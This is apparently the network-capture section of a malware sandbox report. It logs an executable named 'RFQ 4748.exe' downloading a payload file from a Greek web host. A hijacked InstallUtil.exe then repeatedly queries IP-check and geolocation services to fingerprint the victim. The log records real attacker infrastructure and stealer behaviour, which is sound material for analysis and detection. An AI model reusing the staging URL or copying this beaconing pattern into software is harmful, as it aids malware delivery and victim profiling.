3 | 192.168.2.5 | 49712 | 193.122.6.168 | 80 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 11:51:24.027800083 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
Nov 8, 2024 11:51:24.999398947 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1899db07fc706f8dc57b4a4ffdba4fe5
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49714 | 193.122.6.168 | 80 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 11:51:25.764219999 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
Nov 8, 2024 11:51:27.276596069 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:27 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: c1692b4f29b87614e8a6c2be4a4faf9c
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49718 | 193.122.6.168 | 80 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 11:51:28.330817938 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
Nov 8, 2024 11:51:29.174837112 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:29 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 5d853b323f37b9ca28754d62c63e1652
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49724 | 193.122.6.168 | 80 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Nov 8, 2024 11:51:29.970535994 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
Nov 8, 2024 11:51:32.140141010 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 81422fd0b54ecdaa8a310898410e27b7
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.5 | 49758 | 193.122.6.168 | 80 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 8, 2024 11:51:36.213725090 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:37.082256079 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:36 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 8926b44e4b2cfbe0fec3cdee98463e0b
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                                                            Nov 8, 2024 11:51:37.086359978 CET | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 8, 2024 11:51:37.336745977 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 6e8da9d3ef3995a643ec23d92a124b71
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                                                            Nov 8, 2024 11:51:38.181536913 CET | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 8, 2024 11:51:38.431886911 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:38 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 14d59a826eb9f7e5a14fefe60dad1887
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.5 | 49776 | 193.122.6.168 | 80 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 8, 2024 11:51:39.189116001 CET | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 8, 2024 11:51:40.044169903 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: aa4eb903808c5ea483a08811dd34d3a6
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.5 | 49787 | 193.122.6.168 | 80 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 8, 2024 11:51:40.842951059 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:41.689235926 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 2b596ef8ba6960730e002fb9c8e503b6
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.5 | 49796 | 193.122.6.168 | 80 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 8, 2024 11:51:42.459095955 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:43.308401108 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:43 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 6215f2b5aa47f5f75bbd6850143e34fa
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.5 | 49808 | 193.122.6.168 | 80 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 8, 2024 11:51:44.090014935 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:44.933744907 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 245a5c120dddbf4c1c4b9d89c984bd14
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.5 | 49818 | 193.122.6.168 | 80 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 8, 2024 11:51:45.693754911 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:47.073690891 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: b8cdb979e044ca50b285f2a61a1c9749
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.5 | 49831 | 193.122.6.168 | 80 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 8, 2024 11:51:47.840441942 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:49.617852926 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: a6bfa82d29ce5cd1fd55764e78a03773
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.5 | 49704 | 185.78.221.73 | 443 | 5272 | C:\Users\user\Desktop\RFQ 4748.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-11-08 10:51:11 UTC | 86 | OUT | GET /slim/Knlpdavcfrw.vdf HTTP/1.1
                                                            Host: www.oleonidas.gr
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:11 UTC | 273 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:11 GMT
                                                            Server: Apache
                                                            Last-Modified: Fri, 08 Nov 2024 05:15:34 GMT
                                                            Accept-Ranges: bytes
                                                            Content-Length: 952328
                                                            Cache-Control: max-age=1209600
                                                            Expires: Fri, 22 Nov 2024 10:51:11 GMT
                                                            Vary: User-Agent
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-11-08 10:51:18 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:19 UTC | 1219 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:18 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15793
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHJMbN8RLQ6d0jF6nem%2BEFFoZVi9jVIrb975CYYXylLxyegHQrvFEDxfg6mjm7pgTBPVFGa74vnjWyno2Ig15w94rHO63p%2FFTXMTY7Q8mVYsAKPLC2O581EV0MNMu1Hv%2BlPaNi%2Ff"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df501d2be9847a9-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1907&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1664367&cwnd=251&unsent_bytes=0&cid=3d8953d271fc4247&ts=204&x=0"
2024-11-08 10:51:19 UTC | 150 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
2024-11-08 10:51:19 UTC | 209 | IN | Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:51:19 UTC | 63 | OUT | GET /xml/173.254.250.90 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-08 10:51:20 UTC | 1211 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:20 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15795
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9QOPubbZ93c7Ev5VQfMmhfYMnwlPMWGYyo3gzjqY0Kk73QIsJKr0Tb7mYdaWu5Q7vrH6xeHerv72m7X8Wz65sU4Eq87LookR9OXYp6jgeJGm2xK1PBM9fGpcjPriYOMugGTKHOV"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df501da6d336b0b-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1043&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2613718&cwnd=251&unsent_bytes=0&cid=cbf04018bd2a01f9&ts=153&x=0"
2024-11-08 10:51:20 UTC | 158 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</
2024-11-08 10:51:20 UTC | 201 | IN | Data Ascii: RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:51:21 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-08 10:51:22 UTC | 1221 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:21 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15796
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FmEO6qQ%2FWF%2BU7DNm%2F2fF6fcjkbd5S9c24eDbklE4l%2BfiEVWKfcZXnhALU9vbCJ48CCU2P4Zv609XdnyZ1FN36uZkHaLJF6MXVLy301zU0hQrfdrNvswIZMtyq0lDxHkiSrW2zSlv"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df501e64c1b6b06-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1973&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1527426&cwnd=236&unsent_bytes=0&cid=f400ea4ea23f27ba&ts=147&x=0"
2024-11-08 10:51:22 UTC | 148 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-08 10:51:22 UTC | 211 | IN | Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | 360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-08 10:51:23 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-08 10:51:24 UTC | 1219 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:23 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15798
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
